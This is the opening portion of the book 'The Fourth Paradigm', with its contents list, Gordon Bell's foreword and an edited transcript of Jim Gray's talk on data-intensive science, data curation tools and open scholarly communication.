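The original code listing is not reproduced here, so the following is only a rough sketch of what such a SerializeToBinaryStream method could look like. The context class name (NorthwindDbContext), the Customers query, and the connection handling are assumptions rather than the documented sample; the BinaryFormatter and MemoryStream usage is standard .NET.

using System.IO;
using System.Linq;
using System.Runtime.Serialization.Formatters.Binary;

public static class CustomerSerializer
{
    // Loads the customer (plus any related objects currently loaded in the
    // context) and serializes the object graph into a binary MemoryStream.
    public static MemoryStream SerializeToBinaryStream(string customerId)
    {
        using (NorthwindDbContext context = new NorthwindDbContext())
        {
            Customer customer = context.Customers
                                       .FirstOrDefault(c => c.CustomerID == customerId);

            BinaryFormatter formatter = new BinaryFormatter();
            MemoryStream stream = new MemoryStream();
            formatter.Serialize(stream, customer);
            stream.Position = 0;
            return stream;
        }
    }
}

Deserializing would reverse the process by calling the same formatter's Deserialize method on the stream.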
https://docs.telerik.com/help/openaccess-classic/openaccess-tasks-working-with-objects-serialize-deserialize.html
CC-MAIN-2020-24
en
refinedweb
- Type: New Feature
- Status: Reopened
- Priority: Major
- Resolution: Unresolved
- Labels: None
- Environment: Jenkins ver. 2.63

So, I'm having this problem that I described in a similar bug for the lockable-resource plugin (JENKINS-45138). I said to myself, "oh, hey, I remember being able to throttle executions on a per-agent basis!" Imagine my surprise when I hit the documentation and find that throttle is only applicable inside a step. I need to acquire, use, and clean up exclusive access to a resource on each agent. Will throttle work how I expect?

step('foo') {
    throttle(['foo-label'])
    bat '... acquire the resource...'
    bat '... use the resource...'
}
post {
    always {
        bat '... cleanup the resource...'
    }
}

I tried Dmitry Mamchur's creative suggestion, but on more recent versions this is explicitly prohibited:

WorkflowScript: 2: pipeline block must be at the top-level, not within another block. @ line 2, column 5.
   pipeline {
   ^

Demo pipeline:

throttle(['myThrottle']) {
    pipeline {
        agent { label 'mylabel' }
        stages {
            stage('first') {
                steps {
                    sleep 60
                }
            }
        }
    }
}

I've tested many other variants, and I claim it is currently (with the latest versions) impossible to get node throttling on a declarative pipeline. If someone has a counterexample, I would appreciate that.

Marcus Philip

The secret sauce is having your pipeline defined in a shared library.

vars/myPipeline.groovy:

def call() {
    pipeline {
        agent { label 'mylabel' }
        stages {
            stage('first') {
                steps {
                    sleep 60
                }
            }
        }
    }
}

jobs/my-pipeline/Jenkinsfile:

throttle(['myThrottle']) {
    myPipeline()
}

Je-s F-ng C-st! It's insane that that would make a difference, but it does. So the 'pipeline block must be at the top-level' check is just on a file (textual) basis, not on the actual code structure. Thanks Dmitry Mamchur! You made my day!

I honestly did not have much hope when I saw this issue having been updated in my e-mail this morning. Marcus Philip, I'll second your comment/excitement on finally having a solution to this mystery. Dmitry Mamchur, thank you so much! Our team already has our declarative and scripted pipelines largely living in libraries. I gave a couple of attempts to implement the throttle as described by Dmitry Mamchur, and here is a little more on how I think I'll throttle in our builds: by renaming sharedPipeline to sharedPipelineInner and having sharedPipeline wrap the throttle category around the sharedPipelineInner() call. This way, I don't need to update 100+ repositories * number of branches. The current Jenkinsfile looks like this, more or less:

// library imports
sharedPipeline()

vars/sharedPipeline.groovy:

def call() {
    throttle(['throttle-category']) {
        sharedPipelineInner()
    }
}

vars/sharedPipelineInner.groovy:

def call() {
    pipeline {
        agent { label 'mylabel' }
        stages {
            stage('first') {
                steps {
                    sleep 60
                }
            }
        }
    }
}

I did try to simply shift the pipeline config into a def within the original file, but that did not work. This defect asks for throttle within a step, which this solution does not provide, so I guess it will need to stay open. The docs for the plugin should be updated, for sure, with an example like this.

Edit - Then again, the title says entire build, so maybe this solution does apply and the example in the body does not. Anthony Mastrean, can you comment?

I'm seeing what Guy Banay sees.
I'm now testing a Declarative Pipeline workaround as Kyle Walker suggested – namely, putting the properties block outside the pipeline altogether – and it works, but it only honors the maxConcurrentTotal property, not the maxConcurrentPerNode one. Very simple repro (assuming a "ThrottleTest" category is configured globally – see the sketch below): if I configure a maximum of 5 concurrent builds across all nodes, but only 1 per node, the only limit enforced is the total limit; a single build agent can still run as many builds of this job as it has executors. Only the maxConcurrentTotal takes effect.
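The repro snippet itself is not included above; the following is a rough sketch of that setup, assuming the Throttle Concurrent Builds plugin's ThrottleJobProperty is applied through a properties step placed outside the pipeline block. The field names follow the plugin's job property, while the agent label and stage contents are just placeholders.

// Applied outside (before) the declarative pipeline block.
// The 'ThrottleTest' category (max total = 5, max per node = 1) is assumed
// to be configured globally in Manage Jenkins, not in the job itself.
properties([
    [$class: 'ThrottleJobProperty',
     categories: ['ThrottleTest'],
     throttleEnabled: true,
     throttleOption: 'category']
])

pipeline {
    agent { label 'mylabel' }
    stages {
        stage('first') {
            steps {
                sleep 60
            }
        }
    }
}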
https://issues.jenkins-ci.org/browse/JENKINS-45140
CC-MAIN-2020-24
en
refinedweb
Neo4j:

LOAD CSV FROM "" AS row FIELDTERMINATOR "\t"
return COUNT(*)

At java.io.InputStreamReader@4d307fda:6484 there's a field starting with a quote and whereas it ends that quote there seems to be character in that field after that ending quote. That isn't supported. This is what I read: 'weird al"'

This blows up because (as the message says) we've got a field which uses double quotes but then has other characters either side of the quotes. A quick search through the file reveals one of the troublesome lines:

$ grep "\"weird" lastfm-dataset-360K/usersha1-artmbid-artname-plays.tsv | head -n 1

I ran a file containing only that line through CSV Lint to see what it thought, and indeed it is invalid.

Let's clean up our file to use single quotes instead of double quotes and try the query again:

$ tr "\"" "'" < lastfm-dataset-360K/usersha1-artmbid-artname-plays.tsv > lastfm-dataset-360K/clean.tsv

LOAD CSV FROM "" as row FIELDTERMINATOR "\t"
return COUNT(*)

17559530

And we're back in business! Interestingly, Python's CSV reader chooses to strip out the double quotes rather than throw an exception:

import csv

with open("smallWeird.tsv", "r") as file:
    reader = csv.reader(file, delimiter="\t")
    for row in reader:
        print row

$ python explore.py

I prefer LOAD CSV's approach, but it's an interesting trade-off I hadn't considered before.
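Python's csv module can be made to complain about the stray quote instead of silently stripping it. The snippet below is a small sketch using the reader's strict flag; smallWeird.tsv is the same single-line file used above, and the exact exception message varies across Python versions.

import csv

with open("smallWeird.tsv", "r") as f:
    reader = csv.reader(f, delimiter="\t", strict=True)
    try:
        for row in reader:
            print(row)
    except csv.Error as e:
        # With strict=True the reader raises csv.Error on the malformed
        # quoted field instead of silently dropping the quotes.
        print("Bad line %d: %s" % (reader.line_num, e))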
https://markhneedham.com/blog/2015/05/04/neo4j-load-csv-java-io-inputstreamreader-theres-a-field-starting-with-a-quote-and-whereas-it-ends-that-quote-there-seems-to-be-character-in-that-field-after-that-ending-quote-that-isnt-suppor/
CC-MAIN-2020-24
en
refinedweb
SYNOPSIS
mm-link uplink downlink [-- command...]

DESCRIPTION
mm-link is a network emulation tool that emulates links using packet delivery trace files (uplink for the uplink direction and downlink for the downlink direction) provided on the command line. mm-link uses clone(2) to fork a new shell in a distinct network namespace. uplink_trace_file emulates the link from mm-link to the Internet, and downlink_trace_file emulates the link from the Internet to mm-link. mm-link can emulate both time-varying links, such as cellular links, and links with fixed link speeds.

When a packet arrives at the link (from either the Internet or from mm-link), it is placed directly into one of two packet queues depending on its intended direction: the uplink queue or the downlink queue. mm-link releases packets from each queue based on the corresponding input packet-delivery trace. Each line in the trace gives a time, in milliseconds, at which an MTU-sized packet can be delivered in that direction. When mm-link reaches the end of an input trace file, it wraps around to the beginning of the trace file.

mm-link can be nested within delayshell(1) to flexibly create links with a user-supplied one-way delay and a user-supplied link rate. To exit mm-link, simply type "exit" or CTRL-D inside mm-link.

EXAMPLE
To emulate a 12 Mbit/s link (in each direction), make a 12 Mbit/s trace file, "12Mbps_trace". This file can be of arbitrary length and must follow the pattern below:

0
1
2
3
4
5
...

The link above delivers an MTU-sized packet (1500 bytes or 12000 bits) every ms. Run mm-link with:

$ mm-link 12Mbps_trace 12Mbps_trace

Packets sent by programs run from within mm-link are delivered according to the packet delivery times specified in 12Mbps_trace.

mm-link [...] (copyright notice omitted)

AUTHOR
Mahimahi was written by Ravi Netravali, Anirudh Sivaraman, Greg D. Hill, Deepak Narayanan, and Keith Winstein.

BUGS
Please report bugs to [email protected].
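A constant-rate trace like the one above does not have to be typed by hand. The lines below are one possible way to generate it and to nest the link inside a fixed delay, as the DESCRIPTION suggests; the 60-second trace length and the 20 ms delay are arbitrary illustrative values, and the exact delayshell argument format should be checked against delayshell(1).

$ seq 0 59999 > 12Mbps_trace            # one delivery opportunity per millisecond for 60 seconds, i.e. 12 Mbit/s
$ delayshell 20                         # start a shell with 20 ms of one-way delay (illustrative)
$ mm-link 12Mbps_trace 12Mbps_trace     # inside that shell, run the 12 Mbit/s emulated link in both directions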
http://manpages.org/mm-link
CC-MAIN-2020-24
en
refinedweb
Subject: [ublas] zero_matrix iteration
From: Marco Guazzone (marco.guazzone_at_[hidden])
Date: 2009-09-13 14:33:41

Hello dears,

I've noticed that zero_matrix is "not iteratable". That is, if you iterate a zero_matrix Z either by row or by column, the condition "Z.begin1() != Z.end1()" or "Z.begin2() != Z.end2()", respectively, is always FALSE (according to how zero_matrix iterators are defined).

However, if you iterate by using plain row/column indices (instead of iterators), you're successfully able to iterate through a zero_matrix.

Is this conceptually right? I mean, in my opinion a zero_matrix(N,M) should be iterable just like any other ordinary matrix, both with iterators and with simple indices. By preventing iteration (with iterators), it would seem that the matrix has size 0, while it actually has a precise dimension (NxM).

What do you think?

Just out of curiosity, I've looked at MTL4. It seems MTL4 does not have a zero-matrix type. Rather, you assign a scalar 0 to a matrix type or you call the set_to_zero function. The resulting matrix seems to be iterable.

The code below shows an example of what I said above:

---[code]---
#include <boost/numeric/ublas/matrix.hpp>
#include <iostream>

int main()
{
    typedef double value_type;
    typedef boost::numeric::ublas::zero_matrix<value_type> matrix_type;

    matrix_type Z(5,4);

    std::cout << "Iteration by ITERATORS" << std::endl;
    for (matrix_type::const_iterator1 row_it = Z.begin1(); row_it != Z.end1(); ++row_it)
    {
        std::cout << "Iteration by ITERATORS: never entered" << std::endl;

        for (matrix_type::const_iterator2 col_it = row_it.begin(); col_it != row_it.end(); ++col_it)
        {
            matrix_type::size_type row(col_it.index1());
            matrix_type::size_type col(col_it.index2());

            std::cout << "Z(" << row << "," << col << ") = " << *col_it << " ==> " << value_type(0) << std::endl;
        }
    }

    std::cout << "Iteration by INDICES" << std::endl;
    for (matrix_type::size_type row = 0; row < Z.size1(); ++row)
    {
        for (matrix_type::size_type col = 0; col < Z.size2(); ++col)
        {
            std::cout << "Z(" << row << "," << col << ") = " << Z(row, col) << " ==> " << value_type(0) << std::endl;
        }
    }
}
---[/code]---

Cheers!!

-- Marco
https://lists.boost.org/ublas/2009/09/3723.php
CC-MAIN-2020-24
en
refinedweb
Fourth P aradigm Edited by Tony Hey, Stewart Tansley, and Kristin Tolle D a t a -I n t e n s i v e S c i e n t i f i c D i s c o v e r y T H E F o u r th P a r a d i g m The F o u r th D ata -I n t e n s i v e S c i e n t i f i c D i s c o v e r y Paradigm Copyright 2009 Microsoft Corporation Except where otherwise noted, content in this publication is licensed under the Creative Commons AttributionShare Alike 3.0 United States license, available at. org/licenses/by-sa/3.0. Second printing, version 1.1, October 2009. ISBN 978-0-9825442-0-4 Printed in the United States of America. Microsoft, Amalga, Bing, Excel, HealthVault, Microsoft Surface, SQL Server, Virtual Earth, and Windows are trademarks of the Microsoft group of companies. All other trademarks are property of their respective owners. The information, findings, views, and opinions contained in this publication are those of the authors and do not necessarily reflect the views of Microsoft Corporation or Microsoft Research. Microsoft Corporation does not guarantee the accuracy of any information provided herein. Microsoft Research For Jim co n t e n ts xi foreword Gordon Bell xvii jim gray on e science : a transformed scientific method Edited by Tony Hey, Stewart Tansley, and Kristin Tolle Dan Fay 5 13 the emerging science of environmental applications redefining ecological science using data a 2020 vision for ocean science 21 James R. Hunt, Dennis D. Baldocchi, Catharine van Ingen John R. Delaney, Roger S. Barga 27 39 45 55 57 75 65 Simon Mercer Michael Gillam, Craig Feied, Jonathan Handler, Eliza Moody, Ben Shneiderman, Catherine Plaisant, Mark Smith, John Dickason Jeff W. Lichtman, R. Clay Reid, Hanspeter Pfister, Michael F. Cohen Eric Horvitz, William Kristan 83 91 99 toward a computational microscope for neurobiology a unified modeling approach to data- intensive healthcare 109 111 117 125 beyond the tsunami : developing the infrastructure to deal with life sciences data multicore computing and scientific discovery parallelism and the cloud the impact of workflow tools on data- centric research semantic e science : encoding meaning in next- generation Charles Hansen, Chris R. Johnson, Valerio Pascucci, Claudio T. Silva Savas Parastatidis a platform for all that we know : creating a knowledge- driven research infrastructure 4. Schol ar ly communication introduction 175 177 185 193 jim gray s fourth paradigm and the construction of the scientific record text in a data- centric world communication system Paul Ginsparg all aboard: toward a machine- friendly scholarly the future of data policy 201 209 215 John Wilbanks Timo Hannay FINAL THOUGHTS the way forward conclusions next steps acknowledgments a few words about jim ... glossary index 223 227 230 231 235 237 241 Foreword based on dataintensiveor less. The contributing authors in this volume have done an extraordinary job of helping to refine an understanding of this new paradigm from a variety of disciplinary perspectives. In many instances, science is lagging behind the commercial world in the ability to infer meaning from data and take action based on that meaning. However, commerce is comparatively simple: things that can be described by a few numbers or a name are manufactured and then bought and sold. Scientific disciplines cannot easily be encapsulated in a few understandable numbers and names, and most scientific data does not have a high enough economic value to fuel more rapid development of scientific discovery. 
It was Tycho Brahes assistant Johannes Kepler who took Brahes catalog of systematic astronomical observations and discovered the laws of planetary motion. This established the division between the mining and analysis of captured and carefully archived experimental data and the creation of theories. This division is one aspect of the Fourth Paradigm. In the 20th century, the data on which scientific theories were based was often buried in individual scientific notebooks or, for some aspects of big science, stored on magnetic media that eventually become unreadable. Such data, especially from xi individuals or small labs, is largely inaccessible. It is likely to be thrown out when a scientist retires, or at best it will be held in an institutional library until it is discarded. Long-term data provenance as well as community access to distributed data are just some of the challenges. Fortunately, some data places, such as the National Center for Atmospheric Research1 (NCAR), have been willing to host Earth scientists who conduct experiments by analyzing the curated data collected from measurements and computational models. Thus, at one institution we have the capture, curation, and analysis chain for a whole discipline. In the 21st century, much of the vast volume of scientific data captured by new instruments on a 24/7 basis, along with information generated in the artificial worlds of computer models, is likely to reside forever in a live, substantially publicly accessible, curated state for the purposes of continued analysis. This analysis will result in the development of many new theories! I believe that we will soon see a time when data will live forever as archival mediajust. scientiststhe information and computer scientists, database and software engineers and programmers, disciplinary experts, curators and expert annotators, librarians, archivists, and others, who are crucial to the successful management of a digital data collectionlie in having their creativity and intellectual contributions fully recognized. [1] 1 xii FOREWORD In Jim Grays last talk to the Computer Science and Telecommunications Board on January 11, 2007 [2],. The edited version of Jims talk that appears in this book, which was produced from the transcript and Jims slides, sets the scene for the articles that follow. Data-intensive science consists of three basic activities: capture, curation, and analysis. Data comes in all scales and shapes, covering large international experiments; cross-laboratory, single-laboratory, and individual observations; and potentially individuals lives.2 The discipline and scale of individual experiments and especially their data rates make the issue of tools a formidable problem. The Australian Square Kilometre Array of radio telescopes project,3 CERNs Large Hadron Collider,4 and astronomys Pan-STARRS5 array of celestial telescopes are capable of generating several petabytes (PB) of data per day, but present plans limit them to more manageable data collection rates. Gene sequencing machines are currently more modest in their output due to the expense, so only certain coding regions of the genome are sequenced (25 KB for a few hundred thousand base pairs) for each individual. But this situation is temporary at best, until the US$10 million X PRIZE for Genomics6 is won100 people fully sequenced, in 10 days, for under US$10,000 each, at 3 billion base pairs for each human genome. 
Funding is needed to create a generic set of tools that covers the full range of activitiesfrom capture and data validation through curation, analysis, and ultimately permanent archiving. Curation covers a wide range of activities, starting with finding the right data structures to map into various stores. It includes the schema and the necessary metadata for longevity and for integration across instruments, experiments, and laboratories. Without such explicit schema and metadata, the interpretation is only implicit and depends strongly on the particular programs used to analyze it. Ultimately, such uncurated data is guaranteed to be lost. We 2 3 xiii must think carefully about which data should be able to live forever and what additional metadata should be captured to make this feasible. Data analysis covers a whole range of activities throughout the workflow pipeline, including the use of databases (versus a collection of flat files that a database can access), analysis and modeling, and then data visualization. Jim Grays recipe for designing a database for a given discipline is that it must be able to answer the key 20 questions that the scientist wants to ask of it. Much of science now uses databases only to hold various aspects of the data rather than as the location of the data itself. This is because the time needed to scan all the data makes analysis infeasible. A decade ago, rereading the data was just barely feasible. In 2010, disks are 1,000 times larger, yet disc record access time has improved by only a factor of two. Digital Libraries for Data and Documents: Just Like Modern Document Libraries Scientific communication, including peer review, is also undergoing fundamental changes. Public digital libraries are taking over the role of holding publications from conventional librariesbecause of the expense, the need for timeliness, and the need to keep experimental data and documents about the data together. At the time of writing, digital data libraries are still in a formative stage, with various sizes, shapes, and charters. Of course, NCAR is one of the oldest sites for the modeling, collection, and curation of Earth science data. The San Diego Supercomputer Center (SDSC) at the University of California, San Diego, which is normally associated with supplying computational power to the scientific community, was one of the earliest organizations to recognize the need to add data to its mission. SDSC established its Data Central site,7 which holds 27 PB museums. The Australian National Data Service8 (ANDS) has begun offering services starting with the Register My Data service, a card catalog that registers the identity, structure, name, and location (IP address) of all the various databases, including those coming from individuals. The mere act of registering goes a long way toward organizing long-term storage. The purpose of ANDS is to influence national policy on data management and to inform best practices for the curation 7 8 xiv FOREWORD of data, thereby transforming the disparate collections of research data into a cohesive collection of research resources. In the UK, the Joint Information Systems Committee (JISC) has funded the establishment of a Digital Curation Centre9 to explore these issues. Over time, one might expect that many such datacenters will emerge. 
The National Science Foundations Directorate for Computer and Information Science and Engineering recently issued a call for proposals for long-term grants to researchers in data-intensive computing and long-term archiving. In the articles in this book, the reader is invited to consider the many opportunities and challenges for data-intensive science, including interdisciplinary cooperation and training, interorganizational data sharing for scientific data mashups, the establishment of new processes and pipelines, and a research agenda to exploit the opportunities as well as stay ahead of the data deluge. These challenges will require major capital and operational expenditure. The dream of establishing a sensors everywhere data infrastructure to support new modes of scientific research will require massive cooperation among funding agencies, scientists, and engineers. This dream must be actively encouraged and funded. REFERENCES [1] National Science Board, Long-Lived Digital Data Collections: Enabling Research and Education in the 21st Century, Technical Report NSB-05-40, National Science Foundation, September 2005,. [2] Talk given by Jim Gray to the NRC-CSTB in Mountain View, CA, on January 11, 2007,. (Edited transcript also in this volume.) xv Edited by Tony Hey, Stewart Tansley, and Kristin Tolle | Microsoft Research e have to do better at producing tools to support the whole research cyclefrom data capture and data curation to data analysis and data visualization. Today, the tools for capturing data both at the mega-scale and at the milli-scale are just dreadful. After you have captured the data, you need to curate it before you can start doing any kind of data analysis, and we lack good tools for both data curation and data analysis. Then comes the publication of the results of your research, and the published literature is just the tip of the data iceberg. By this I mean that people collect a lot of data and then reduce this down to some number of column inches in Science or Natureor 10 pages if it is a computer science person writing. So what I mean by data iceberg is that there is a lot of data that is collected but not curated or published in any systematic way. There are some exceptions, and I think that these cases are a good place for us to look for best practices. I will talk about how the whole process of peer review has got to change and the way in which I think it is changing and what CSTB can do to help all of us get access to our research. 1 National Research Council,; Computer Science and Telecommunications Board,. 2 This presentation is, poignantly, the last one posted to Jims Web page at Microsoft Research before he went missing at sea on January 28, 2007. xvii Science Paradigms Thousand years ago: science was empirical describing natural phenomena . 2 a 4Gp c2 = K 2 a 3 a unify theory, experiment, and simulation Data captured by instruments or generated by simulator Processed by software Information/knowledge stored in computer Scientist analyzes database / files using data management and statistics eScience is where IT meets scientists. Researchers are using many different methods to collect or generate datafrom sensors and CCDs to supercomputers and particle colliders. When the data finally shows up in your computer, what do you do with all this information that is now in your digital shoebox? People are continually seeking me out and saying, Help! Ive got all this data. What am I supposed to do with it? My Excel spreadsheets are getting out of hand! 
So what comes next? What happens when you have 10,000 Excel spreadsheets, each with 50 workbooks in them? Okay, so I have been systematically naming them, but now what do I do? Science Paradigms I show this slide [Figure 1] every time I talk. I think it is fair to say that this insight dawned on me in a CSTB study of computing futures. We said, Look, computational science is a third leg. Originally, there was just experimental science, and then there was theoretical science, with Keplers Laws, Newtons Laws of Motion, Maxwells xviii X-Info The evolution of X-Info and Comp-X for each discipline X How to codify and represent our knowledge Experiments & Instruments Other Archives Literature Simulations Facts F Facts Questions Answers Facts Facts FIGURE 2 a huge increase in data from the experimental sciences. People now do not actually look through telescopes. Instead, they are looking through large-scale, complex instruments which relay data to datacenters, and only then do they look at the information on their computers. [1]. X-Info and Comp-X and the metabolic pathways or the behavior of a cell or the way a protein is built. xix This is similar to Jeannette Wings idea of computational thinking, in which computer science techniques and technologies are applied to different disciplines [2]. The goal for many scientists is to codify their information so that they can exchange it with other scientists. Why do they need to codify their information? Because if I put some information in my computer, the only way you are going to be able to understand that information is if your program can understand the information. This means that the information has to be represented in an algorithmic way. In order to do this, you need a standard representation for what a gene is or what a galaxy is or what a temperature measurement is. Experimental Budgets Are to Software I have been hanging out with astronomers for about the last 10 years, and I get to go to some of their base stations. One of the stunning things for me is that I look at their telescopes and it is just incredible. It is basically 15 to 20 million dollars worth of capital equipment, with about 20 to 50 people operating the instrument. But then you get to appreciate that there are literally thousands of people writing code to deal with the information generated by this instrument and that millions of lines of code are needed to analyze all this information. In fact, the software cost dominates the capital expenditure! This is true at the Sloan Digital Sky Survey (SDSS), and it is going to continue to be true for larger-scale sky surveys, and in fact for many large-scale experiments. I am not sure that this dominant software cost is true for the particle physics community and their Large Hadron Collider (LHC) machine, but it is certainly true for the LHC experiments. Even in the small data sciences, you see people collecting information and then having to put a lot more energy into the analysis of the information than they have done in getting the information in the first place. The software is typically very idiosyncratic since there are very few generic tools that the bench scientist has for collecting and analyzing and processing the data. This is something that we computer scientists could help fix by building generic tools for the scientists. I have a list of items for policymakers like CSTB. The first one is basically to foster both building tools and supporting them. 
NSF now has a cyberinfrastructure organization, and I do not want to say anything bad about them, but there needs to be more than just support for the TeraGrid and high-performance computing. We now know how to build Beowulf clusters for cheap high-performance computing. But we do not know how to build a true data grid or to build data stores made out of cheap data bricks to be a place for you to put all your data and then analyze the xx information. We have actually made fair progress on simulation tools, but not very much on data analysis tools. Project Pyramids and Pyramid Funding This section is just an observation about the way most science projects seem to work. There are a few international projects, then there are more multi-campus projects, and then there are lots and lots of single-lab projects. So we basically have this Tier 1, Tier 2, Tier 3 facility pyramid, which you see over and over again in many different fields. The Tier 1 and Tier 2 projects are generally fairly systematically organized and managed, but there are only relatively few such projects. These large projects can afford to have both a software and hardware budget, and they allocate teams of scientists to write custom software for the experiment. As an example, I have been watching the U.S.-Canadian ocean observatoryProject Neptuneallocate some 30 percent of its budget for cyberinfrastructure [3]. In round numbers, thats 30 percent of 350 million dollars or something like 100 million dollars! Similarly, the LHC experiments have a very large software budget, and this trend towards large software budgets is also evident from the earlier BaBar experiment [4, 5]. But if you are a bench scientist at the bottom of the pyramid, what are you going to do for a software budget? You are basically going to buy MATLAB3 and Excel4 or some similar software and make do with such off-the-shelf tools. There is not much else you can do. So the giga- and mega-projects are largely driven by the need for some largescale resources like supercomputers, telescopes, or other large-scale experimental facilities. These facilities are typically used by a significant community of scientists and need to be fully funded by agencies such as the National Science Foundation or the Department of Energy. Smaller-scale projects can typically get funding from a more diverse set of sources, with funding agency support often matched by some other organizationwhich could be the university itself. In the paper that Gordon Bell, Alex Szalay, and I wrote for IEEE Computer [6], we observed that Tier 1 facilities like the LHC get funded by an international consortium of agencies but the Tier 2 LHC experiments and Tier 3 facilities get funded by researchers who bring with them their own sources of funding. So funding agencies need to fully fund the Tier 1 giga-projects but then allocate the other half of their funding for cyberinfrastructure for smaller projects. 3 4 xxi To summarize what I have been saying about software, what we need are effectively Laboratory Information Management Systems. Such software systems provide a pipeline from the instrument or simulation data into a data archive, and we are close to achieving this in a number of example cases I have been working on. Basically, we get data from a bunch of instruments into a pipeline which calibrates and cleans the data, including filling in gaps as necessary. 
Then we re-grid5 the information and eventually put it into a database, which you would like to publish on the Internet to let people access your information. The whole business of going from an instrument to a Web browser involves a vast number of skills. Yet whats going on is actually very simple. We ought to be able to create a Beowulf-like package and some templates that would allow people who are doing wet-lab experiments to be able to just collect their data, put it into a database, and publish it. This could be done by building a few prototypes and documenting them. It will take several years to do this, but it will have a big impact on the way science is done. As I have said, such software pipelines are called Laboratory Information Management Systems, or LIMS. Parenthetically, commercial systems exist, and you can buy a LIMS system off the shelf. The problem is that they are really geared towards people who are fairly rich and are in an industrial setting. They are often also fairly specific to one or another task for a particular communitysuch as taking data from a sequencing machine or mass spectrometer, running it through the system, and getting results out the other side. Information Management and Data Analysis So here is a typical situation. People are collecting data either from instruments or sensors, or from running simulations. Pretty soon they end up with millions of files, and there is no easy way to manage or analyze their data. I have been going door to door and watching what the scientists are doing. Generally, they are doing one of two thingsthey are either looking for needles in haystacks or looking for the haystacks themselves. The needle-in-the-haystack queries are actually very easyyou are looking for specific anomalies in the data, and you usually have some idea of what type of signal you are looking for. The particle physicists are looking 5 This means to regularize the organization of the data to one data variable per row, analogous to relational database normalization. xxii for the Higgs particle at the LHC, and they have a good idea of how the decay of such a heavy particle will look like in their detectors. Grids of shared clusters of computers are great for such needle-in-a-haystack queries, but such grid computers are lousy at trend analysis, statistical clustering, and discovering global patterns in the data. We actually need much better algorithms for clustering and for what is essentially data mining. Unfortunately, clustering algorithms are not order N or N log N but are typically cubic in N, so that when N grows too large, this method does not work. So we are being forced to invent new algorithms, and you have to live with only approximate answers. For example, using the approximate median turns out to be amazingly good. And who would have guessed? Not me! Much of the statistical analysis deals with creating uniform samples, performing some data filtering, incorporating or comparing some Monte Carlo simulations, and so on, which all generates a large bunch of files. And the situation with these files is that each file just contains a bundle of bytes. If I give you this file, you have to work hard to figure out what the data in this file means. It is therefore really important that the files be self-describing. When people use the word database, fundamentally what they are saying is that the data should be self-describing and it should have a schema. Thats really all the word database means. 
So if I give you a particular collection of information, you can look at this information and say, I want all the genes that have this property or I want all of the stars that have this property or I want all of the galaxies that have this property. But if I give you just a bunch of files, you cant even use the concept of a galaxy and you have to hunt around and figure out for yourself what is the effective schema for the data in that file. If you have a schema for things, you can index the data, you can aggregate the data, you can use parallel search on the data, you can have ad hoc queries on the data, and it is much easier to build some generic visualization tools. In fairness, I should say that the science community has invented a bunch of formats that qualify in my mind as database formats. HDF6 (Hierarchical Data Format) is one such format, and NetCDF7 (Network Common Data Form) is another. These formats are used for data interchange and carry the data schema with them as they go. But the whole discipline of science needs much better tools than HDF and NetCDF for making data self-defining. 6 7 xxiii. The Need for Data Tools: Let 100 Flowers Bloom The suggestion that I have been making is that we now have terrible data management tools for most of the science disciplines. Commercial organizations like Walmart can afford to build their own data management software, but in science we do not have that luxury. At present, we have hardly any data visualization and analysis tools. Some research communities use MATLAB, for example, but the funding agencies in the U.S. and elsewhere need to do a lot more to foster the building of tools to make scientists more productive. When you go and look at what scientists are doing, day in and day out, in terms of data analysis, it is truly dreadful. And I suspect that many of you are in the same state that I am in where essentially the only tools I have at my disposal are MATLAB and Excel! We do have some nice tools like Beowulf 8 clusters, which allow us to get costeffective high-performance computing by combining lots of inexpensive computers. We have some software called Condor9 that allows you to harvest processing cycles from departmental machines. Similarly, we have the BOINC10 (Berkeley Open Infrastructure for Network Computing) software that enables the harvesting of PC cycles as in the SETI@Home project. And we have a few commercial products like MATLAB. All these tools grew out of the research community, and I cannot figure out why these particular tools were successful. We also have Linux and FreeBSD Unix. FreeBSD predated Linux, but somehow Linux took off and FreeBSD did not. I think that these things have a lot to do with the community, the personalities, and the timing. So my suggestion is that we should just have lots of things. We have commercial tools like LabVIEW,11 8 9 xxiv for example, but we should create several other such systems. And we just need to hope that some of these take off. It should not be very expensive to seed a large number of projects. The Coming Revolution in Scholarly Communication I have reached the end of the first part of my talk: it was about the need for tools to help scientists capture their data, curate it, analyze it, and then visualize it. The second part of the talk is about scholarly communication. 
About three years ago, Congress passed a law that recommended that if you take NIH (National Institutes of Health) funding for your research, you should deposit your research reports with the National Library of Medicine (NLM) so that the full text of your papers should be in the public domain. Voluntary compliance with this law has been only 3 percent, so things are about to change. We are now likely to see all of the publicly funded science literature forced online by the funding agencies. There is currently a bill sponsored by Senators Cornyn and Lieberman that will make it compulsory for NIH grant recipients to put their research papers into the NLM PubMed Central repository.12 In the UK, the Wellcome Trust has implemented a similar mandate for recipients of its research funding and has created a mirror of the NLM PubMed Central repository. But the Internet can do more than just make available the full text of research papers. In principle, it can unify all the scientific data with all the literature to create a world in which the data and the literature interoperate with each other [Figure 3 on the next page].! Take the example of somebody who is working for the National Institutes of Healthwhich is the case being discussed herewho produces a report. Suppose he discovers something about disease X. You go to your doctor and you say, Doc, Im not feeling very well. And he says, Andy, were going to give you a bunch of tests. And they give you a bunch of tests. He calls you the next day and says, 12 See Peter Subers Open Access newsletter for a summary of the current situation: newsletter/01-02-08.htm. xxv FIGURE 3 Theres nothing wrong with you. Take two aspirins, and take some vacation. You go back a year later and do the same thing. Three years later, he calls you up and says, Andy, you have X! We figured it out! You say, Whats X? He says, I have no idea, its a rare disease, but theres this guy in New York who knows all about it. So you go to Google13 and type in all your symptoms. Page 1 of the results, up comes X. You click on it and it takes you to PubMed Central and to the abstract All About X. You click on that, and it takes you to the New England Journal of Medicine, which says, Please give us $100 and well let you read about X. You look at it and see that the guy works for the National Institutes of Health. Your tax dollars at work. So Lieberman14 and others have said, This sucks. Scientific information is now peer reviewed and put into the public domainbut only in the sense that anybody can read it if theyll pay. Whats that about? Weve already paid for it. The scholarly publishers offer a service of organizing the peer review, printing the journal, and distributing the information to libraries. But the Internet is our distributor now and is more or less free. This is all linked to the thought process that society is going through about where intellectual property begins and ends. The scientific literature, and peer reviewed literature in particular, is probably one of the places where it ends. If you want to find out about X, you will probably be 13 14 Or, as Jim might have suggested today, Bing. The Federal Research Public Access Act of 2006 (Cornyn-Lieberman). xxvi able to find out that peach pits are a great treatment for X. But this is not from the peer reviewed literature and is there just because theres a guy out there who wants to sell peach pits to you to cure X. 
